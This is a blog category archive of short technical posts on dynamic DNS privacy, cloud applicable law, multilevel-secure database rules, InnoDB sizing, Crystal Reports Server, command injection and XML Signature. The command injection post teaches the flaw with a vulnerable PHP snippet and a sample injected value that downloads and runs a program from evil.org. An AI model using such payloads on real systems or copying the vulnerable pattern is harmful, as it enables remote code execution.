Archive for category Application Development

The Problem with Dynamic DNS

Consider a business traveler who has a laptop configured to automatically update a remote DNS server with its current IP address. If the FQDN that was being updated by the laptop is known, or can be guessed, then anyone with modest computer skills can issue DNS queries on that name at regular intervals and monitor the current IP address.

As the traveler moves from one location to another, the IP address will change and the public DNS record for the FQDN will reflect this. The person monitoring the domain name will be able to observe the precise network locations used whenever the laptop connects to the Internet, as well as an approximate timestamp for when each event took place. Depending on the resources available to the monitor, most notably whether or not they work for law enforcement, they may be able to map that network location to a geographic location, possibly with a high degree of resolution.

The public DNS system is distributed across thousands of servers on the Internet and is used in a wide range of Internet protocols. Dynamic DNS monitoring uses nothing more than basic DNS queries and as such it offers effectively complete anonymity to the person doing the surveillance. Not only that, the target this is unable to detect that they are being observed in this manner. This represents a new form of surveillance that might be used by law enforcement for legitimate purposes or for unethical reasons by co-workers, competitors, or even stalkers, of the target.

Dynamic DNS is used by a large number of users for various reasons. For many of these, with static residential or business computers, monitoring poses no real privacy risk. But for those who travel with their laptop it could pose a serious risk to their personal privacy and business confidentiality. This risk has not been widely recognized thus far.

Advertisements

, , ,

Leave a comment

How to determine applicable law in the cloud?

The identification of applicable laws in the absence of any explicit choice by the parties involved is difficult in relation to any information society service, and cloud computing service models are certainly no exception. In a European context, the provisions of the eCommerce Directive play a central role, as it contains specific rules on applicable law for information society services. However, it is clear that this will be insufficient to address all questions in this domain: the rules established by the Directive obviously apply only in Member States, and in a non-European international context will not be able to solve conflicts of law. In addition, applicability of the law remains linked to the geographical location of the information society service provider, and in a cloud model it may be difficult to identify this entity or its geographical location. Finally, certain issues including contractual consumer protection clauses and intellectual property protection are excluded from the Directive’s scope, meaning that answers to conflicts of law in these domains will have to be sought elsewhere. Thus, it is already very complicated to identify the starting point for the establishment of trust, namely the specific laws that will apply in the absence of a choice by the parties. Globally, voluntary choice of applicable law by the stakeholders in a cloud service model may be the only viable solution to identify applicable law. In practice, the importance of this issue should not be overstated, as the choice of an applicable legal system on a contractual basis has indeed become standard practice in information society service contracts.

, ,

Leave a comment

Conflict Resolution and Rule Priorities in an MLS Active Database

We can specify any of the conflict resolution policies enumerated above for rules having the same security level. However, if there are rules belonging to different security levels, the conflict resolution policy must always favor the dominated rule. This is because delaying
a rule at the dominated level because of the execution of a rule at the dominating level may give rise to a timing channel.

In a multilevel secure active database system we can also specify priorities, but the requirement is that no dominating rule must have a higher priority than a dominated rule. Thus, if priorities are specified by ordering the set of rules, then all rules at dominated levels must be ordered before any rule at the dominating level.

If numeric priorities are to be specified, one approach is to make the priority specification have two parts: one for the security level and the other for the number. For rules having different security levels, the dominated rules will get preference over the dominating rules. For rules having the same security level, the number will decide which rule is chosen for execution.

, , , ,

Leave a comment

Determining InnoDB Resource Requirements

It is all well and good to wave one’s hands and say “InnoDB clearly requires far more memory for these reasons,” but it gets slightly difficult to pin down exactly how much more memory. This is true for several reasons:

1. How did you load your database?

InnoDB table size is not a constant. If you took a straight SQL dump from a MyISAM table and inserted it into an InnoDB table, it is likely larger than it really needs to be. This is because the data was loaded out of primary key order and the index isn’t tightly packed because of that. If you took the dump with the order by primary argument to mysql dump, you likely have a much smaller table and will need less memory to buffer it.

2. What exactly is your table size?

This is an easy question to answer with MyISAM: that information is directly in the output of “SHOW TABLE STATUS”. However, the numbers from that same source for InnoDB are known to be estimates only. The sizes shown are the physical sizes reserved for the tables and have nothing to do with the actual data size at that point. Even the row count is a best guess.

3. How large is your primary key?

It was mentioned above that InnoDB clusters the data for a table around the primary key. This means that any secondary index leaves must contain the primary key of the data they “point to.” Thus, if you have tables with a large primary key, you will need more
memory to buffer a secondary index and more disk space to hold them. This is one of the reasons some people argue for short “artificial” primary keys for InnoDB tables when there isn’t one “natural” primary key.

There is no set method that will work for everyone to predict the needed resources. Worse than that, your needed resources will change with time as more inserts to your table increase its size and fragment the packing of the BTree.  It is important to not run at 100% usage of the innodb buffer, as this likely means that you’re not buffering as much as you could for reads, and that you’re starving your write buffer which also lives in the same global innodb_buffer.

, , , , , , , , , ,

Leave a comment

Crystal Reports Server

Crystal Reports Server is services-oriented architecture of BusinessObjects Enterprise. BusinessObjects Enterprise is a complete business intelligence (BI) platform that provides specialized end-user tools including Crystal Reports, Web Intelligence, OLAP  Intelligence, Performance Manager, and Dashboard Manager. BusinessObjects Enterprise also includes data integration capabilities from Data Integrator. It is architected using modern web standards with an industry-standard communication framework to tie all the components and services together.

Crystal Reports Server harnesses the reporting services and components of the BusinessObjects Enterprise architecture to offer small and medium businesses a proven reporting solution. It addresses the complete reporting process—from data access and report design, to report management and delivery, to report integration with portals and enterprise applications.

Functional Architecture of Crystal Reports Server

Crystal Reports Server is comprised of separate—yet interconnected—components and services optimized for specific tasks. These components and services include:

CRS

  • Data services for comprehensive and flexible data access
  • Creation tool for flexible data formatting using Crystal Reports
  • Platform services for report publishing, security, and processing
  • Management tools for managing Crystal Reports Server services and objects
  • Web and application services for customized report integration with portals and applications
  • User interaction tier for end-user report viewing and interaction

, , , , , , , , , , , , , , ,

Leave a comment

Command Injection

A successful command injection attack gives the attacker complete control of the remote system.

When user input is used as part of a system command, an attack may be able to inject system commands into the user input. This can happen in any programming language; however, it is very common in Perl, PHP, and shell based CGI. It is less common in Java, Phython, and C#. Consider the following PHP code snippet:

<?php
$email_subject = “some subject”;
if ( isset($_GET{’email’})) {
system(“mail ” + $_GET{’email’}) + ” -s ‘” + $email_subject +
“‘ < /tmp/email_body”, $return_val);
}
?>

The user sends his or her e-mail address in the email parameter, and that user input is placed directly into a system command. Like SQL injection, the goal of the attacker is to inject a shell command into the email parameter while ensuring that the code before and after the email parameter is syntactically correct. Consider the system() call as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle piece in the middle to finish it off:

mail [MISSING PUZZLE PIECE] –s ‘some subject’ < /tmp/email_body

The puzzle piece needs to ensure that the mail command runs and exits properly. For example, mail –help will run and exit properly. Then the attacker could add additional shell commands by separating the commands with semicolons (;). Dealing with the puzzle piece on the other side is as simple as commenting it out with the shell comment symbol (#). Thus, a useful puzzle piece for the email parameter might be this:

–help; wget http://evil.org/attack_program; ./attack_program #

Adding this puzzle piece to the puzzle creates the following shell command:

mail –help; wget http://evil.org/attack_program;
./attack_program # s ‘some subject’ < /tmp/email_body

This is equivalent to this:

mail –help; wget http://evil.org/attack_program; ./attack_program

This runs mail –help and then downloads attack_program from evil.org and executes it, allowing the attacker to perform arbitrary commands on the vulnerable web site.

, , , , ,

1 Comment

Using XML Signature

A digital signature is a cryptographic value that enables a recipient to verify the source and validity of
an incoming message. XML Signature defines an XML syntax for digital signatures.

When you enable SOAP header processing for a particular virtual service, the ACE XML Gateway
validates XML signatures in incoming messages received at the interface defined by the object. If a
signature does not match the element that is signed, the message is rejected.

Signature validity may not alone ensure message integrity—the signature could have been generated
using any certificate, including one issued by an untrusted source. If using XML Signature as part of
your implementation strategy, you should also specify which Certificate Authorities you want to be
trusted, and direct the ACE XML Gateway to accept only signatures generated with certificates issued
by those trusted CA.

Enabling header processing causes signatures to be validated if present in an incoming message (and
causes messages with invalid signatures to be blocked), but it doesn’t require a message to have a
signature.

The final step in configuring XML Signature, therefore, is specifying the elements of the incoming
message that must be signed. In the policy configuration, you can require a signature covering one or
more of:

  • the message timestamp (a common practice in Web service implementations).
  • the first element below the SOAP body.
  • a particular element you specify by XPath. Each XPath expression you specify must resolve to a
    signed XML element whose signature must be valid for the ACE XML Gateway to accept the
    message.

, , , , , , , ,

Leave a comment

%d bloggers like this: